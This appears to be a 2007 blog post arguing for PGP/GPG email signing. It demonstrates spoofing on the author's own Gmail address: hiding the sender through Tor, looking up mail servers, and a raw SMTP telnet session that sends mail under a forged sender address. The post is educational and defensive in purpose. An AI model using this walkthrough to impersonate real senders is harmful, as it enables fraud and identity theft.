Saturday, August 18, 2007

Why do you need PGP?

Lets answer a more basic question first: Why do you need any security constructs like AntiVirus, firewall, IDS etc? Maybe because:

  • You have secret/vital information to protect.
  • The exploit/attack is so easy that any casual user can do it.. for fun.

On my laptop running Linux I don't have an antivirus, firewall or IDS.. I don't have any critical information on my laptop (the critical information is encrypted using my DNA sequence, scrambled using my iris pattern as seed, divided into blocks and stored on NSA servers :P), nor does it run continuously to give the attacker any time to conduct the attack... It's a different story altogether for workstations running 24x7. That said, why do I need PGP to encrypt/authenticate my mails then? It's not that I need to protect my mails from the public eye or even a passive listener.. come on, what can a person get by reading the emails I write to my friends and family!!.. The problem arises when he can write emails to my friends and family using my email ID.. and be undetected. The point of concern is how much easier it is to do so.. let me show you how:

PLEASE NOTE: Doing this is illegal in US and EU unless you own the email addresses you are using. Posing as a third party is considered Identity theft and is a criminal offense. I am using the email address that belongs to me and this demonstration is only for the educational purposes. I am not responsible for anything you might do with the information provided here.

  • Cover your tracks: What better way to do that than tor+privoxy!! Since I will be using telnet for this exploit, I need a way to torrify telnet. torrify command does that but I was too lazy to figure out the syntax. I grabbed tor_aliases to do that. Its a small script that you add to your .bashrc , which automatically torrifies various net tools like telnet, scp etc.(Thanks t3rmin4t0r for pointing it out to me on #linux-india).
  • Find the smtp server of the victim: I am going to send a mail to testingusage@gmail.com(again the ID belongs to me and I use it for testing purposes). Lets figure out which smtp server gmail uses..


  • sridhar@pico:~$ dig mx gmail.com
    ; <<>> DiG 9.3.4 <<>> mx gmail.com
    ;; global options: printcmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8033
    ;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 7

    ;; QUESTION SECTION:
    ;gmail.com. IN MX

    ;; ANSWER SECTION:
    gmail.com. 3534 IN MX 50 gsmtp183.google.com.
    gmail.com. 3534 IN MX 5 gmail-smtp-in.l.google.com.
    gmail.com. 3534 IN MX 10 alt1.gmail-smtp-in.l.google.com.
    gmail.com. 3534 IN MX 10 alt2.gmail-smtp-in.l.google.com.
    gmail.com. 3534 IN MX 50 gsmtp163.google.com.

    ;; ADDITIONAL SECTION:
    gmail-smtp-in.l.google.com. 214 IN A 209.85.199.114
    gmail-smtp-in.l.google.com. 214 IN A 209.85.199.27
    alt1.gmail-smtp-in.l.google.com. 237 IN A 64.233.167.114
    alt1.gmail-smtp-in.l.google.com. 237 IN A 64.233.167.27
    alt2.gmail-smtp-in.l.google.com. 285 IN A 66.249.91.27
    gsmtp163.google.com. 5883 IN A 64.233.163.27
    gsmtp183.google.com. 4017 IN A 64.233.183.27

    ;; Query time: 64 msec
    ;; SERVER: 192.168.1.1#53(192.168.1.1)
    ;; WHEN: Sun Jul 29 14:05:57 2007
    ;; MSG SIZE rcvd: 270


    MX points to the servers that receives email. The numbers 50,5,10,10,50 you see are preference numbers. Lower the number, the higher the preference.. for us it means that we have higher probability of a successful attack. which implies that we will be using gmail-smtp-in.l.google.com.

  • Speaking SMTP: The last step is to speak in SMTP to make the server to accept the mail. I am not going to teach you SMTP here. Check out RFC 821 for the details.
  • sridhar@pico:~/blog$ telnet gmail-smtp-in.l.google.com. 25
    Resolving gmail-smtp-in.l.google.com. through tor... 209.85.129.27
    Trying 209.85.129.27...
    Connected to 209.85.129.27.
    Escape character is '^]'.
    220 mx.google.com ESMTP o11si2850482fkf
    502 5.5.1 Unrecognized command o11si2850482fkf
    helo
    250 mx.google.com at your service
    mail from: <testingusage@gmail.com>
    250 2.1.0 OK
    rcpt to: <testingusage@gmail.com>
    250 2.1.5 OK
    data
    354 Go ahead
    From: Someone <someone@someone.com>
    Subject: Testing

    I see the light!!

    .
    250 2.0.0 OK 1187318464 o11si2850482fkf
    quit

Please do note that testingusage@gmail.com is my own ID, so no harm done. What have I just done? Sent an email to testingusage@gmail.com as someone@someone.com... I could have used any email address there and nothing will be traceable back to me. The following screenshot shows you the result:


As you can see that the message was marked as spam, that is because I did not create the mail properly and someone.com may be in its blacklist. It's fairly easy to fool those spam filters.

Infact the method just demonstrated is used alot by spammers.. just a bit more refined and automated. Nothing is stopping your mortal enemy from impersonating you and wreak a havoc in your life. Yes there are ways to detect a fake mail.. IP analysis, route it takes etc etc, but it all requires the receiver to be a paranoid geek. How many mails do you receive daily and how many times have you stopped to check the authenticity of the mail?

So what is the solution?.. PGP or it's free, open source implementation GPG(GNU Privacy Guard). There are millions of tutorials on the web so am not going to write another one here.

In a nutshell, it attaches a keyed hash to your mail. Since it uses DSA, only you posses the key to create the hash. All others users can only verify your hash using your public key (which has to be published on keyring servers e.g. http://pgp.mit.edu ). The email client takes care of the whole process so you don't have to do anything except the initial setup.

Is it fool proof? NO.. This will only stop casual attacks. The attacker may spoof your identity, create a public key with your credentials and ask the receiver to download his public key, so the receiver might consider your emails fake and the attacker's emails real, but of course this is not something your friend might do for fun.

Bottom line; if you are breaking up with someone on email, proposing someone or making a million dollar deal, use GPG to tell the receiver that it's really you :)
BTW my pgp key is this. That said I can always deny sending a mail which doesn't have my signature... which I might use to satisfy my evil ends ..Mwahahahaha.

PS: There are chances that the attack shown above might not work. This would happen if your IP is blacklisted.

3 comments:

  1. This comment has been removed by the author.

    ReplyDelete
  2. Hi Sridhar!

    Looks like there was a recent vulnerability in Gmail (a cross-site request forgery, which google was quick to update) which allowed something very similar to what you have demonstrated. The vulnerability you described, is it only for gmails or in general?

    ReplyDelete
  3. This is not csrf or css.. this is a flaw in smtp and is not specific to gmail.

    ReplyDelete